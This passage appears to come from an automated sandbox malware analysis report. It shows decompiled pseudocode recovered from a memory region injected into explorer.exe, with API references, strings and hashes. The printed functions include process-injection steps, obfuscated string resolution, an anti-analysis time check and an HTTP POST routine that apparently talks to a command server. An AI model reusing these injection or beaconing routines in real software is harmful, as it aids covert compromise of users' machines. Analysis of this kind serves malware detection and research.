					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x34f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x34f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}

0x0008c6c6
0x0008c6cd
0x0008c6cf
0x0008c6d1
0x0008c6d3
0x0008c6d6
0x0008c6d9
0x0008c6dc
0x0008c6df
0x0008c6e2
0x0008c6e5
0x0008c6ef
0x0008c6f2
0x0008c6f9
0x0008c6fe
0x0008c6fe
0x0008c704
0x0008c706
0x0008c70f
0x0008c8b5
0x0008c8b9
0x0008c8be
0x0008c8c4
0x0008c8c7
0x0008c8c7
0x0008c8cb
0x0008c8d0
0x0008c8d5
0x0008c8e2
0x0008c8e2
0x0008c8eb
0x0008c8ed
0x0008c8f5
0x0008c8f5
0x0008c8fc
0x0008c8fc
0x0008c718
0x0008c719
0x0008c71e
0x0008c724
0x0008c726
0x0008c727
0x0008c728
0x0008c72d
0x0008c72e
0x0008c738
0x00000000
0x00000000
0x0008c743
0x0008c74d
0x0008c757
0x0008c75a
0x0008c760
0x0008c767
0x0008c768
0x0008c769
0x0008c772
0x0008c773
0x0008c774
0x0008c776
0x0008c779
0x0008c77c
0x0008c77f
0x0008c782
0x0008c78e
0x0008c7b0
0x0008c7b8
0x0008c7bb
0x0008c7c6
0x0008c7c6
0x0008c7b8
0x0008c7cc
0x0008c7d5
0x0008c7d7
0x0008c7d8
0x0008c7da
0x0008c7db
0x0008c7dc
0x0008c7dd
0x0008c7e1
0x0008c7e8
0x0008c7e9
0x0008c7f1
0x0008c8b2
0x00000000
0x0008c7f7
0x0008c7f7
0x0008c7f9
0x0008c7fa
0x0008c7ff
0x0008c800
0x0008c801
0x0008c802
0x0008c803
0x0008c809
0x0008c80a
0x0008c80f
0x0008c810
0x0008c818
0x00000000
0x00000000
0x0008c82e
0x0008c830
0x0008c837
0x00000000
0x00000000
0x0008c848
0x0008c84e
0x0008c856
0x0008c859
0x0008c85f
0x0008c86f
0x0008c87b
0x0008c880
0x0008c886
0x0008c896
0x0008c8a2
0x0008c8aa
0x00000000
0x0008c8aa

APIs

RegisterClassExA.USER32 ref: 0008C785
CreateWindowExA.USER32 ref: 0008C7B0
DestroyWindow.USER32 ref: 0008C7BB
UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

0, xrefs: 0008C74D
cdcdwqwqwq, xrefs: 0008C76A
sadccdcdsasa, xrefs: 0008C73E

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
Opcode Fuzzy Hash: 5474bce5d18d4943309ca91fb3254532eb6dfdcf916d9e8241832134b147adef
Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x34f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}

0x00085f82
0x00085f92
0x00085f9c
0x000860d0
0x000860c3
0x00000000
0x000860c5
0x000860d7
0x00086098
0x00000000
0x00086098
0x00085fa2
0x00085faa
0x00085fb1
0x00085fb3
0x00000000
0x00085fc6
0x00085fc6
0x00085fcc
0x00085fd2
0x00085fe2
0x00085fe7
0x00085fef
0x00085ff7
0x00086013
0x00086018
0x0008601b
0x0008601d
0x0008601f
0x0008602c
0x00086035
0x0008603e
0x00086043
0x00086044
0x00086052
0x0008605c
0x0008606d
0x00086072
0x00086079
0x00086080
0x00086083
0x0008608f
0x00086090
0x0008609c
0x000860a5
0x000860a9
0x000860b7
0x000860ba
0x000860c1
0x00000000
0x00000000
0x00000000
0x000860c1
0x00086092
0x00086097
0x00000000
0x00085ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
SetLastError.KERNEL32(000000AA), ref: 000860D7

Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
GetLastError.KERNEL32 ref: 00085FEF
memset.MSVCRT ref: 00086013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
GetFileAttributesW.KERNEL32(00000000), ref: 00086083

Strings

Hello qqq, xrefs: 00085F8D

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21

Uniqueness

Uniqueness Score: -1.00%

Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x32f4d0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x32f4d0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x32f4d0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x32f4d0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x32f4d0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x32f4d0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x32f4d0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x32f4d0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x32f4d0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x32f4d0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x32f4d0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x32f4d0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x32f4d0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x32f4d0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x32f4d0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x32f4d0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x32f4d0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x32f4d0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x0008e671
0x0008e683
0x0008e68c
0x0008e696
0x0008e69a
0x0008e6ab
0x0008e6c2
0x0008e6cf
0x0008e6dc
0x0008e6e9
0x0008e6ec
0x0008e6f1
0x0008e6f6
0x0008e6f8
0x0008e700
0x0008e70b
0x0008e712
0x0008e71e
0x0008e721
0x0008e72f
0x0008e732
0x0008e738
0x0008e739
0x0008e73b
0x0008e744
0x0008e745
0x0008e74a
0x0008e750
0x0008e75a
0x0008e75c
0x0008e761
0x0008e761
0x0008e770
0x0008e77f
0x0008e783
0x0008e792
0x0008e795
0x0008e79a
0x0008e79e
0x0008e7a5
0x0008e7ac
0x0008e7b4
0x0008e7bc
0x0008e7c3
0x0008e7cb
0x0008e7d3
0x0008e7da
0x0008e7e2
0x0008e7ea
0x0008e7ff
0x0008e80c
0x0008e80e
0x0008e813
0x0008e813
0x0008e81a
0x0008e82b
0x0008e830
0x0008e832
0x0008e832
0x0008e846
0x0008e858
0x0008e85a
0x0008e85d
0x0008e862
0x0008e862
0x0008e869
0x0008e878
0x0008e87c
0x0008e8ba
0x0008e8bf
0x0008e8c7
0x0008e8cc
0x0008e8d7
0x0008e8dd
0x0008e8e7
0x0008e8ea
0x0008e8f3
0x0008e8f8
0x0008e8f8
0x0008e901
0x0008e94a
0x0008e94c
0x0008e953
0x0008e954
0x0008e957
0x0008e95d
0x0008e961
0x0008e962
0x0008e967
0x0008e969
0x0008e96f
0x0008e984
0x0008e98c
0x0008e9c1
0x0008e9c6
0x0008e9cb
0x00000000
0x0008e9cd
0x0008e98e
0x0008e990
0x0008e990
0x0008e999
0x0008e99c
0x0008e99e
0x0008e9a0
0x0008e9a6
0x0008e9a6
0x0008e9ab
0x0008e9ad
0x0008e9b4
0x0008e9b4
0x00000000
0x0008e9b7
0x0008e971
0x0008e979
0x00000000
0x0008e903
0x0008e903
0x0008e909
0x0008e90f
0x0008e912
0x00000000
0x0008e912
0x0008e901
0x0008e87e
0x0008e884
0x0008e888
0x0008e889
0x0008e88e
0x0008e890
0x0008e896
0x0008e8b4
0x0008e8b4
0x00000000
0x0008e8b4
0x0008e898
0x0008e8a2
0x0008e8a4
0x0008e8a5
0x0008e8aa
0x0008e8ac
0x0008e8b2
0x00000000
0x00000000
0x00000000
0x0008e86b
0x0008e86b
0x0008e914
0x0008e914
0x0008e91a
0x0008e91d
0x00000000
0x0008e91d
0x0008e81c
0x0008e81c
0x0008e91f
0x0008e91f
0x0008e925
0x0008e928
0x00000000
0x0008e928
0x0008e81a
0x0008e785
0x0008e92a
0x0008e92d
0x0008e92f
0x0008e932
0x0008e935
0x0008e93e
0x0008e943
0x00000000
0x00000000
0x0008e947
0x00000000
0x0008e947
0x0008e754
0x00000000

APIs

memset.MSVCRT ref: 0008E69A
memset.MSVCRT ref: 0008E6AB
memset.MSVCRT ref: 0008E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0008E785

Strings

POST, xrefs: 0008E84B

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000916c1
0x000916c8
0x000916d1
0x000916d5
0x00091750
0x00000000
0x00091752
0x000916e3
0x000916e5
0x000916ea
0x00000000
0x00000000
0x000916f2
0x000916f4
0x000916f9
0x00000000
0x00000000
0x00091703
0x00091707
0x00000000
0x00000000
0x00091709
0x0009170e
0x00091710
0x00091711
0x00091715
0x0009171b
0x00000000
0x00000000
0x00091726
0x0009172f
0x00091733
0x00000000
0x00000000
0x00091735
0x00091737
0x0009173f
0x00091741
0x00091742
0x0009174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701

Strings

advapi32.dll, xrefs: 000916C3
CryptReleaseContext, xrefs: 000916FB
CryptAcquireContextA, xrefs: 000916DD
CryptGenRandom, xrefs: 000916EC

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764

Uniqueness

Uniqueness Score: -1.00%

Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x00092125
0x0009212a
0x0009212e
0x0009212e
0x00092133
0x00092138
0x00092139
0x0009213c
0x0009213d
0x00092142
0x00092145
0x00092146
0x0009214b
0x00092152
0x000921f8
0x000921f8
0x00000000
0x00092161
0x00092161
0x00092168
0x0009216c
0x00092173
0x0009217c
0x0009217e
0x0009217e
0x0009217c
0x0009218d
0x000921b3
0x000921bc
0x000921be
0x000921c4
0x000921f3
0x000921f3
0x000921fb
0x000921fe
0x000921fe
0x000921c6
0x000921c7
0x000921cd
0x000921cf
0x000921cf
0x000921d4
0x000921d3
0x000921d3
0x000921db
0x000921e7
0x000921f1
0x000921f1
0x00000000
0x0009219d
0x0009219d
0x0009219d
0x000921a3
0x00000000
0x00000000
0x000921a5
0x000921ab
0x000921b0
0x00000000
0x000921b0
0x0009218d

APIs

_snprintf.MSVCRT ref: 00092146
localeconv.MSVCRT ref: 00092161
strchr.MSVCRT ref: 00092173
strchr.MSVCRT ref: 00092184
strchr.MSVCRT ref: 00092192
strchr.MSVCRT ref: 000921B7

Strings

%.*g, xrefs: 0009213D

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 00090332
qsort.MSVCRT ref: 000905B0

Strings

%I64d, xrefs: 00090324
null, xrefs: 000902F7
true, xrefs: 00090309
false, xrefs: 00090315

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0008D75C
SysAllocString.OLEAUT32(?), ref: 0008D764
SysAllocString.OLEAUT32(00000000), ref: 0008D778
SysFreeString.OLEAUT32(?), ref: 0008D7F3
SysFreeString.OLEAUT32(?), ref: 0008D7F6
SysFreeString.OLEAUT32(?), ref: 0008D7FB

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

